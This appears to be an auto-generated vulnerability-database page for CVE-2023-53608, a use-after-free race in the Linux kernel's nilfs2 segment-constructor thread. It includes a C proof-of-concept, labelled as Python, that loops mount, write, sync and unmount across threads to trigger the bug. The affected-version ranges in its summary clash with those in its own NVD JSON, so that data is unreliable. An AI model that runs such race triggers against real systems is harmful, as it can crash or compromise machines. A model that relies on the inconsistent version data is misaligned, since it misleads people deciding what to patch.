CVE-2023-53608

Description

In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix potential UAF of struct nilfs_sc_info in nilfs_segctor_thread() The finalization of nilfs_segctor_thread() can race with nilfs_segctor_kill_thread() which terminates that thread, potentially causing a use-after-free BUG as KASAN detected. At the end of nilfs_segctor_thread(), it assigns NULL to "sc_task" member of "struct nilfs_sc_info" to indicate the thread has finished, and then notifies nilfs_segctor_kill_thread() of this using waitqueue "sc_wait_task" on the struct nilfs_sc_info. However, here, immediately after the NULL assignment to "sc_task", it is possible that nilfs_segctor_kill_thread() will detect it and return to continue the deallocation, freeing the nilfs_sc_info structure before the thread does the notification. This fixes the issue by protecting the NULL assignment to "sc_task" and its notification, with spinlock "sc_state_lock" of the struct nilfs_sc_info. Since nilfs_segctor_kill_thread() does a final check to see if "sc_task" is NULL with "sc_state_lock" locked, this can eliminate the race.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux kernel < 4.19.300

Linux kernel 4.20 ~ 5.4.262

Linux kernel 5.5 ~ 5.10.202

Linux kernel 5.11 ~ 5.15.140

Linux kernel 5.16 ~ 6.1.64

Linux kernel 6.2 ~ 6.5.13

Linux kernel 6.6 ~ 6.6.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/* CVE-2023-53608 - nilfs2 UAF PoC
 * This PoC demonstrates the race condition between
 * nilfs_segctor_thread() and nilfs_segctor_kill_thread()
 *
 * Note: Requires a system with nilfs2 filesystem support
 * and local access with low privileges.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>

#define MOUNT_POINT "/tmp/nilfs_test"
#define NILFS_DEVICE "/dev/nullb0"  // null_blk device for testing

// Thread function to repeatedly mount/unmount nilfs2
void *race_thread(void *arg) {
    int iterations = *(int *)arg;
    for (int i = 0; i < iterations; i++) {
        // Mount nilfs2 filesystem
        if (mount(NILFS_DEVICE, MOUNT_POINT, "nilfs2", 0, "") == 0) {
            // Create some files to trigger segment construction
            char path[256];
            snprintf(path, sizeof(path), "%s/test_%d", MOUNT_POINT, i);
            int fd = open(path, O_CREAT | O_WRONLY, 0644);
            if (fd >= 0) {
                write(fd, "trigger segment construction\n", 28);
                close(fd);
            }
            // Sync to trigger segctor thread
            sync();
            // Unmount quickly to race with kill_thread
            umount(MOUNT_POINT);
        }
    }
    return NULL;
}

int main(int argc, char *argv[]) {
    int num_threads = 4;
    int iterations = 100;
    pthread_t threads[4];

    // Create mount point
    mkdir(MOUNT_POINT, 0755);

    printf("[+] Starting race condition trigger for CVE-2023-53608\n");
    printf("[+] Spawning %d threads, %d iterations each\n", num_threads, iterations);

    // Launch multiple threads to increase race probability
    for (int i = 0; i < num_threads; i++) {
        pthread_create(&threads[i], NULL, race_thread, &iterations);
    }

    // Wait for all threads
    for (int i = 0; i < num_threads; i++) {
        pthread_join(threads[i], NULL);
    }

    printf("[+] Race condition attempts completed\n");
    printf("[+] Check dmesg for KASAN UAF detection\n");

    rmdir(MOUNT_POINT);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53608
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53608
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53608/
[4] VulDB https://vuldb.com/cve/CVE-2023-53608
[5] https://git.kernel.org/stable/c/034cce77d52ba013ce62b4f5258c29907eb1ada5
[6] https://git.kernel.org/stable/c/0dbf0e64b91ee8fcb278aea93eb06fc7d56ecbcc
[7] https://git.kernel.org/stable/c/613bf23c070d11c525268f2945aa594704a9b764
[8] https://git.kernel.org/stable/c/6be49d100c22ffea3287a4b19d7639d259888e33
[9] https://git.kernel.org/stable/c/92684e02654c91a61a0b0561433b710bcece19fe
[10] https://git.kernel.org/stable/c/b4d80bd6370b81a1725b6b8f7894802c23a14e9f
[11] https://git.kernel.org/stable/c/bae009a2f1b7c2011d2e92d8c84868d315c0b97e
[12] https://git.kernel.org/stable/c/f32297dba338dc06d62286dedb3cdbd5175b1719

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53608", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.527", "lastModified": "2026-03-23T18:28:35.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix potential UAF of struct nilfs_sc_info in nilfs_segctor_thread()\n\nThe finalization of nilfs_segctor_thread() can race with\nnilfs_segctor_kill_thread() which terminates that thread, potentially\ncausing a use-after-free BUG as KASAN detected.\n\nAt the end of nilfs_segctor_thread(), it assigns NULL to \"sc_task\" member\nof \"struct nilfs_sc_info\" to indicate the thread has finished, and then\nnotifies nilfs_segctor_kill_thread() of this using waitqueue\n\"sc_wait_task\" on the struct nilfs_sc_info.\n\nHowever, here, immediately after the NULL assignment to \"sc_task\", it is\npossible that nilfs_segctor_kill_thread() will detect it and return to\ncontinue the deallocation, freeing the nilfs_sc_info structure before the\nthread does the notification.\n\nThis fixes the issue by protecting the NULL assignment to \"sc_task\" and\nits notification, with spinlock \"sc_state_lock\" of the struct\nnilfs_sc_info. Since nilfs_segctor_kill_thread() does a final check to\nsee if \"sc_task\" is NULL with \"sc_state_lock\" locked, this can eliminate\nthe race."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.30", "versionEndExcluding": "4.14.313", "matchCriteriaId": "C7897F33-089A-45DB-B407-301671DC567B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.281", "matchCriteriaId": "FA9A5EE5-EA8C-4F9C-8205-020D45B82C9B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.241", "matchCriteriaId": "A6C89301-5E43-4A77-878F-AC2043FD2741"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.178", "matchCriteriaId": "896B51EF-6427-4DFF-A2CA-819B349840A1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.107", "matchCriteriaId": "6BCC0C73-754E-4985-A087-F74888650709"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.24", "matchCriteriaId": "E6EC432F-985F-450F-954E-7EAD42ADA1F8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.11", "matchCriteriaId": "93C03C9A-798F-4CD5-912F-A436BFA0CC7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc4:*:*:*:*:*:*", "matchCriteriaId": "DC271202-7570-4505-89A4-D602D47BFD00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc5:*:*:*:*:*:*", "matchCriteriaId": "D413BB6D-4F74-4C7D-9163-47786619EF53"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/034cce77d52ba013ce62b4f5258c29907eb1ada5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0dbf0e64b91ee8fcb278aea93eb06fc7d56ecbcc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/613bf23c070d11c525268f2945aa594704a9b764", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6be49d100c22ffea3287a4b19d7639d259888e33", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/92684e02654c91a61a0b0561433b710bcece19fe", "sou ... (truncated)